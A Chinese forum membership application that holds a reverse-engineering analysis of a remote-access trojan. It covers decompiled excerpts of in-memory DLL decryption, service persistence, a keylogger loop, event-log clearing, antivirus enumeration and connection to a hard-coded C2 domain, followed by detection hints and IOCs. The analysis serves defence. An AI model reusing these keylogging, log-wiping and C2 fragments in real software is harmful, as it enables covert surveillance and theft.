申请标题:申请会员 ID:An_spectator
1、申请ID:An_spectator
2、个人邮箱:3020025192@qq.com
3、原创技术文章:技术文章标准请参考论坛精华帖
样本分析:在处理日常任务时发现可疑 IP 172.247.132.146,简单查看后发现它是一个保存文件的站点,且只保存了一个 shoves.exe 文件。该文件疑似远控木马,现做简要分析。沙箱分析:程序运行后会不断向域名 vip79318901.f3322.net 的主机发送请求(分别用 ApateDNS 和 inetsim 观察到;注意 f3322.net 是动态域名服务,其解析 IP 可能随时变化,IOC 应以域名为准);存在修改注册表以实现自启动的行为;修改/读取镜像劫持(Image File Execution Options)相关的注册表项;以及其他有关网络配置的敏感操作。沙箱中不存在文件写入操作,但存在大量的文件读操作,用于加载依赖模块并导入函数:
PE 文件分析:程序未加壳;恶意代码存在一个自定义的 baidu 节;内部使用了 RC5 算法进行加/解密。程序入口处调用 GetStartupInfoA,原文将其视为简单的反调试,但从下面的反汇编看(调用 __wincmdln 后检查 StartupInfo.dwFlags 的 STARTF_USESHOWWINDOW 位并取 wShowWindow 作为 nCmdShow),这只是 MSVC CRT 标准的 WinMain 启动代码,并不是反调试手段:
9 | .text:00401F9A lea eax, [ebp+StartupInfo]
.text:00401F9D push eax ; lpStartupInfo
.text:00401F9E call ds:GetStartupInfoA ; standard MSVC CRT WinMain startup sequence, not anti-debugging
.text:00401FA4 call __wincmdln ; CRT helper that returns the command line
.text:00401FA9 mov [ebp+lpCmdLine], eax
.text:00401FAC test byte ptr [ebp+StartupInfo.dwFlags], 1 ; bit 0 == STARTF_USESHOWWINDOW
.text:00401FB0 jz short loc_401FB8 ; flag not set -> use the default nCmdShow
.text:00401FB2 movzx eax, [ebp+StartupInfo.wShowWindow] ; flag set -> wShowWindow becomes nCmdShow for WinMain
.text:00401FB6 jmp short loc_401FBB | 程序对自身的部分数据进行解密,相关操作存放在恶意代码自定义的 baidu 节中:
4 | baidu:00410213 52 push edx
baidu:00410214 50 push eax
baidu:00410215 68 BC 60 41 00 push offset byte_4160BC
baidu:0041021A E8 91 FD FF FF call decrypt_40FFB0 | 解密是对从 0x4160BC 开始的一段数据进行的操作,完成后内存中从 0x4160BC 开始是一个完整的 DLL 文件,该程序的主要攻击行为都在这个 DLL 中。该 DLL 只在内存中解密,推测由宿主程序自行加载而不落盘,这也与沙箱中未观察到文件写入相吻合;分析时应在 decrypt_40FFB0 返回后从内存中 dump 出这段数据。DLL 文件仅有一个导出函数 fuckyou。DllMain 分析:DllMain 主要是一些初始化操作:
68 | GetInputState();
cur_thread_id = GetCurrentThreadId();
PostThreadMessageA(cur_thread_id, 0, 0, 0); // posts message 0 (WM_NULL) to its own thread ...
GetMessageA(&Msg, 0, 0, 0); // ... and pumps it once (presumably just to force a message queue for this thread)
//
if ( dword_10011FBC ) // anti-analysis: compares the parent of this process with explorer.exe's PID and exits when the check fails
{
explorer_pid = get_explore_pid_100070B0();
cur_pro_id = GetCurrentProcessId();
if ( (explorer_pid == 0) == get_parent_process_pid_10007000(cur_pro_id) ) // NOTE(review): as decompiled this compares a bool with a PID -- check the real condition in the disassembly
ExitProcess(0);
} //
//
VersionInformation.dwOSVersionInfoSize = 148; // 148 == sizeof(OSVERSIONINFOEXA)
GetVersionExA(&VersionInformation); //
//
if ( &dword_10011FCC != -2 ) // decompiler artifact (address compared with -2); effectively always true
create_thread_100080D0(0, 0, download_from_url_10006100, &dword_10011FCC + 2, 0, 0);// spawns a downloader thread; its argument points 2 DWORDs past dword_10011FCC (presumably the URL in the embedded config -- confirm)
//
if ( dword_10011FC8 ) // config flag: kill rundll32.exe
kill_run32dll_10005CB0();
if ( !byte_10011FB8 ) // service registration (persistence) path
//
{
String = 0;
memset(&v25, 0, 0x3FCu);
v26 = 0;
v27 = 0;
Format = '%'; // format string "%s" is assembled on the stack
v12 = 's';
v13 = 0;
sprintf(ServiceName_10011CD4, &Format, ServiceName_10011CD4); // src == dst: effectively a no-op copy of the service name
ServiceStartTable.lpServiceName = 'nnoC'; // stack-built string: these three DWORDs read "ConnectGroup" in memory (little-endian), NUL-terminated by LOBYTE(v16) below
ServiceStartTable.lpServiceProc = 'Gtce';
v15 = 'puor';
LOBYTE(v16) = 0;
set_service_reg_10004D50(ServiceName_10011CD4, &ServiceStartTable, &String, 1024);// register the service; String receives an error/status text (checked below)
// Rspgcu zcltpgnd
//
if ( !lstrlenA(&String) ) // empty status text == success
{
reg_service_10003050(ServiceName_10011CD4, a1521); // "1521" also appears in the %SystemDirectory%\1521.key file name used by the keylogger
reg_set_10005D20(ServiceName_10011CD4);
}
v9 = init_COM_10006FB0();
wsprintfA(&String2, aS, v9);
if ( dword_10011FB4 )
{
memset(&Dst, 0, 0x104u);
GetModuleFileNameA(0, &Dst, 0x104u); // path of the running executable
SHGetSpecialFolderPathA(0, &v18, 43, 0); // CSIDL 43 (0x2B) == CSIDL_PROGRAM_FILES_COMMON -- verify
lstrcatA(&v18, asc_1001172C);
lstrcatA(&v18, &String2);
lstrcatA(&v18, aExe);
MoveFileA(&Dst, &v18); // relocates its own binary under that folder (self-install)
}
else
{
memset(&Filename, 0, 0x104u);
GetModuleFileNameA(0, &Filename, 0x104u);
}
Sleep(0x32u);
v10 = create_thread_100080D0(0, 0, sub_100063D0, 0, 0, 0); // main payload thread (the attackfun_100063D0 described below)
WaitForSingleObject(v10, 0xFFFFFFFF);
CloseHandle(v10);
while ( 1 )
Sleep(1000000u); // parks the thread forever; DllMain never returns from here
} | 以上包括父进程检查(反分析)、初始化并注册服务、自我搬移等操作。程序的主要攻击逻辑存放在 attackfun_100063D0() 中,即上面 create_thread 调用的 sub_100063D0:
7 | v0 = CreateMutexA(0, 0, &Name); // 确保只有一个运行实例
if ( v0 && GetLastError() == ERROR_ALREADY_EXISTS ) // single-instance guard: the named mutex already exists, so another copy is running
{
ReleaseMutex(v0);
CloseHandle(v0);
exit(0); // bail out of the whole process, not just this thread
} | [td]1
8 | if ( dword_10011FC0 )
{
sub_10003AB0(v23, v8); // builds the dispatcher object whose vtable (off_1000C30C) points at switch_case_10003D30
LOBYTE(v24) = 1;
input_record_10003AE0(); // starts the keylogger thread (key_logger_100026A0)
LOBYTE(v24) = 0;
sub_10003A60(v23);
} | [td]1
4 | int input_record_10003AE0()
{
return create_thread_100080D0(0, 0, key_logger_100026A0, 0, 0, 0);
} | 使用 GetKeyState、GetAsyncKeyState 轮询按键状态实现击键记录(下面片段中的常量 16 为 VK_SHIFT,20 为 VK_CAPITAL,8 为 VK_BACK,13 为 VK_RETURN):
42 | v3 = GetKeyState(16);
v4 = *&byte_100113DC[v2 * 4]; // v2 indexes a table of virtual-key codes; v4 is the VK being polled
v5 = v3; // v3 == GetKeyState(16) from the previous line, 16 == VK_SHIFT
if ( ((GetAsyncKeyState(*&byte_100113DC[v2 * 4]) >> 8) & 0x80u) == 0 ) // high bit clear: the key is currently up
{
v6 = *(&v8 + v4); // per-VK "was pressed" flag, indexed by VK code
if ( v6 )
{
*(&v8 + v4) = 0; // key released after being pressed: consume the flag and record it
if ( v4 == 8 ) // 8 == VK_BACK
{
lstrcatA(&String, String2); // String2 is presumably a backspace marker -- confirm
sub_10002450(&String); // hands the buffer off (the network excerpt below shows where it ends up)
}
else if ( lstrlenA(&String) <= 550 ) // buffer is flushed once it grows past 550 chars
{
if ( v4 != 13 ) // 13 == VK_RETURN
{
if ( v6 % 2 == 1 ) // flag parity selects one of two key-name tables (presumably shifted vs. unshifted forms -- confirm)
{
lstrcatA(&String, off_10011248[v2]);
}
else if ( !(v6 % 2) )
{
lstrcatA(&String, off_100110B4[v2]);
}
goto LABEL_35;
}
lstrcatA(&String, aEnter); // Enter terminates a line and forces a flush
sub_10002450(&String);
}
else
{
sub_10002450(&String);
}
memset(&String, 0, 0x258u); // clear the 600-byte buffer after every flush
}
}
else if ( GetKeyState(20) && v5 > -1 && v4 > '@' && v4 < ']' ) // key is down, 20 == VK_CAPITAL toggled on, Shift up (v5 >= 0), v4 in 0x41..0x5C ('A'..'Z', '[', '\')
{
*(&v8 + v4) = 1; // only the CapsLock case is visible here; the other flag values tested above are set outside this excerpt
} | 将击键记录的内容发送到硬编码的 C2 域名 vip79318901.f3322.net:
11 | else
{
v1 = *&asc_10011BA4; // value read from a string constant (presumably the port) -- confirm
lstrcatA(&String1, aVip79318901F33); // fallback target: the hard-coded C2 host "vip79318901.f3322.net"
}
if ( strcmp(&String1, byte_10013470) ) // only connect when the host differs from byte_10013470 (presumably the last host tried -- confirm)
{
v3 = GetTickCount();
if ( connect_url_10001D00(v8, &String1, v1) ) // success leaves the retry loop
break;
} |
- sub_10003AB0(v23, v8) 构造的对象带有虚函数表 off_1000C30C,后续通过该表间接调用 switch_case_10003D30:
2 | *v2 = &off_1000C30C;
v2[1004] = 0 | [td]1
3 | .rdata:1000C30C off_1000C30C dd offset sub_10003A40 ; DATA XREF: sub_100039F0+11↑o
.rdata:1000C30C ; sub_10003A60+C↑o ...
.rdata:1000C310 dd offset switch_case_10003D30 | switch_case_10003D30 根据不同的 case 值(推测为 C2 下发的命令码)分发到不同的处理函数。提权:
2 | case 0x70u:
v5 = create_thread_100080D0(0, 0, privilege_10002CE0, *(this[1] + 72), 0, 0); | 所谓“提权”的关键函数流程是:通过 OpenProcessToken 得到进程令牌句柄,用 LookupPrivilegeValue 查询指定特权名对应的 LUID,最后用 AdjustTokenPrivileges 启用该特权(Attributes = 2 即 SE_PRIVILEGE_ENABLED)。需要注意这只能启用令牌中本来就存在的特权,并不能获得新的权限,严格来说不是提权:
4 | LookupPrivilegeValueA(0, Name, NewState.Privileges);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Attributes = 2; // 2 == SE_PRIVILEGE_ENABLED: enables a privilege the token already holds; it cannot add one
AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0, 0, 0); | 删除日志:[td]1
2 | case 4u:
delete_event_log_10002E20(a2[1]); | 删除日志函数遍历一个日志名列表,对每个名字调用 OpenEventLog 打开日志;打开成功则调用 ClearEventLog 清除日志(备份文件名参数为 NULL,即不做备份),最后调用 CloseEventLog 关闭句柄。检测提示:清除操作本身会被 Windows 记录(Security 日志事件 1102 / System 日志事件 104),可作为检测点:
12 | do
{
v3 = OpenEventLogA(0, *v2); // *v2: next log name from a table walked by v2; v8 holds the remaining count
v4 = v3;
if ( v3 )
{
ClearEventLogA(v3, 0); // backup file name == NULL: the log is wiped without a backup
CloseEventLog(v4);
}
++v2;
result = v8-- - 1; // loop continues while result != 0 (condition is outside this excerpt)
} | 弹出MessageBox:[td]1
3 | case 0xAu:
v5 = create_thread_100080D0(0, 0, msgbox_10002DD0, (a2 + 1), 0, 0);
goto LABEL_22; | [td]1
40 | memset(&v174, 0, 0x40u);
v1 = LoadLibraryA(aKernel32Dll_1); // v1 is only NULL-checked at the very end, after GetProcAddress has already used it
creat_tool_help = GetProcAddress(v1, aCreatetoolhelp); // CreateToolhelp32Snapshot / Process32First / Process32Next are resolved at run time, so they do not show up in the import table
pro32_first = GetProcAddress(v1, aProcess32first);
pro32_next = GetProcAddress(v1, aProcess32next);
pro_list = (creat_tool_help)(2, 0); // 2 == TH32CS_SNAPPROCESS
if ( pro_list )
{
v175 = 296; // PROCESSENTRY32.dwSize (296 bytes for the ANSI struct on x86)
if ( !strstr(Str, SubStr) )
{
v4 = &Str; // walks a table of (process name, label) string pairs; an entry containing SubStr ends the table
do
{
if ( (pro32_first)(pro_list, &v175) ) // the snapshot is re-walked from the start for every table entry
{
v5 = *v4;
while ( lstrcmpiA(v5, &String2) ) // String2 is presumably the szExeFile field of v175 -- confirm the offset
{
if ( !(pro32_next)(pro_list, &v175) )
goto LABEL_10;
}
lstrcatA(lpString1, v4[1]); // a matching process is running: append its label ...
lstrcatA(lpString1, SubStr); // ... followed by SubStr as separator
}
LABEL_10:
v6 = v4[2];
v4 += 2;
v175 = 296;
}
while ( !strstr(v6, SubStr) );
}
}
CloseHandle(pro_list); // called even when the snapshot failed (pro_list == 0 / INVALID_HANDLE_VALUE)
result = lstrlenA(lpString1);
if ( !result )
result = lstrcpyA(lpString1, asc_100121B8); // nothing matched: fall back to a default string
if ( v1 )
result = FreeLibrary(v1);
return result;
return result; | 查询的杀毒软件列表如下。注意:CreateToolhelp32Snapshot/Process32First/Process32Next 是通过 GetProcAddress 在运行时解析的,不会出现在导入表中;而且该函数只是把匹配到的杀毒软件名称拼接成字符串(推测用于上报),并未对这些进程做任何处理。导出函数 fuckyou:其功能与 DllMain 基本一致,主要也是调用 attackfun_100063D0 进行恶意行为以及一些保持服务常驻的操作。其他一些可疑操作:程序还存在写入文件 %SystemDirectory%\1521.key 的操作,配合击键记录函数保存击键记录:
5 | GetSystemDirectoryA(&Buffer, 0x104u);
strcat(&Buffer, asc_1001172C);
strcat(&Buffer, a1521);
strcat(&Buffer, aKey);
v1 = CreateFileA(&Buffer, 0x40000000u, 2u, 0, 4u, 0x80u, 0); | (参数含义:0x40000000 = GENERIC_WRITE,共享模式 2 = FILE_SHARE_WRITE,创建方式 4 = OPEN_ALWAYS,属性 0x80 = FILE_ATTRIBUTE_NORMAL。)但是在沙箱运行中并未发现文件的写入操作。总结:该程序是 RAT 木马,具有提权(实为启用令牌特权)、击键记录、清除事件日志、枚举杀毒软件进程等功能,可用于建立僵尸网络、发送垃圾邮件等;原文称其用于 APT 攻击,但本次分析并没有支持这一归因的证据。该程序在测试时未被一些主流杀毒软件报毒,具有较强的威胁性。相关 IOC(除下表外,前文提到的 C2 域名 vip79318901.f3322.net 与分发 IP 172.247.132.146 也应纳入 IOC):[td]list | value | MD5 | ae318e417963fbaec1c0664b9162b63d | SHA-1 | 965b9b5be709e95950fd10ab1614edf3ab1ae70d | SHA-256 | 10eeadc0c512fa8d52ee66f3d181f2ec9de65cba5c08559eea20b60d41867876 | Vhash | 04505666151d15104012z180055mz6gz | Authentihash | 058ca13631c7f65271190aaad5b67bc259d18c0b71d4fc368820b150facc655f | Imphash | 926997c7dd52b150779d1291ece24039 | SSDEEP | 3072:3abe6nVEb7Mt+e74m3mOsr5PrQ+EGCZs+RbjySnKv:3yeH/e7hAr5DQ+yZvqSK | File type | Win32 EXE | Magic | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | File size | 428.00 KB (438272 bytes) | PEiD packer | Microsoft Visual C++ |